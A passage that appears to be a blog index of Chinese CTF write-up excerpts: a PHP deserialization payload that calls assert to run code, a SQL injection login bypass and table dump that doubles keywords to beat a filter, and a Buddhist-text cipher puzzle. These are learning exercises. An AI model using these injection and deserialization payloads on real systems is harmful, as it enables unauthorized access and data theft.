【NPUCTF2020】ReadlezPHP
[NPUCTF2020]ReadlezPHP这道题打开看到一个鬼(bushi)和一个报时台,看代码发现是一个time.php 访问一下,显示了时间,传一个source参数,得到了源代码 看来是一个反序列化题,从源码来看,突破点应该在这 先用phpinfo看看可不可以 payload:?data=O:8:”HelloPhp”:2:{s:1:”a”;s:9:”phpinfo()”;s:1:”b”;s:6:”assert”;} 然后拿到了flag(真在环境变量里啊) 因为做了,但没想到有点简单,所以wp放这里了
【极客大挑战 2019】BabySQL1_writeup
第一步:打开题目确定注入点先尝试了最简单的admin' or 1=1#,结果发现回显变成了'1=1#'再尝试了admin' order by 1# ,回显'der 1=1#',由此确定or和by被替换成了空格此外被过滤的还有select,union,from,information,where通过双写绕过admin' oorrder bbyy 1# ,成功登录了 第二步:开始查询数据库名 1?username=1'ununionion selselectect 1,database(),3;%23&password=1 库名为geek接下来查表名 1?username=1'ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere...
that's a good day
Here is a flag,can you find it?thats interesting…佛曰:夢梵朋栗諳薩怯以伊薩所菩皤集訶怯帝梵依悉除皤闍地槃俱老怯夢侄苦明呐陀能罰。礙除皤豆梵曳俱孕梵顛呐曰悉真缽盡依呐藝是俱波冥恐俱想奢利奢他亦蘇密缽帝俱尼冥隸諳一哆老侄逝阿神遮以依明奢栗冥槃怯孕利耶瑟哆亦孕羅侄怛罰離帝皤諸罰若等婆罰依數帝真菩遮真俱僧那冥摩彌穆有怛缽無悉特漫迦奢悉奢蘇皤離怖奢楞冥醯切諳亦南皤諸俱得得曰羅奢藝夜俱迦逝侄咒諳藝冥耶怛怯跋缽老冥等諳蘇是侄吉皤夷無俱蒙俱大缽上。罰槃缽寫怯真耶罰得諸侄漫諳訶除道梵那侄喝蒙摩帝諳姪數罰顛皤吉盧無僧怯瑟孕怯夜罰姪侄若諳都皤度波咒上呐都南醯波室奢隸夢哆那呐訶諳夷醯至多殿倒皤參哆悉皤遮謹俱吉侄勝哆故梵數呐等麼室迦罰帝哆除南奢瑟諳知依伽侄婆怯婆奢倒羅奢勝罰輸實悉耶哆倒僧苦集輸罰滅無梵想真怯得呐摩吉夜罰一缽呼死哆姪俱豆心曰伊隸密爍呐穆一冥僧者曰一罰彌般夢諳舍竟皤輸梵闍諳陀哆道世提跋俱蘇侄摩怯穆利罰波竟缽悉爍諳能陀呐盡諳地罰一娑梵切罰伽阿呐亦沙哆亦礙阿跋缽藐勝即缽諦地侄想礙等諳恐諳阿藐皤孕跋怯豆菩侄勝漫豆帝呐曳梵故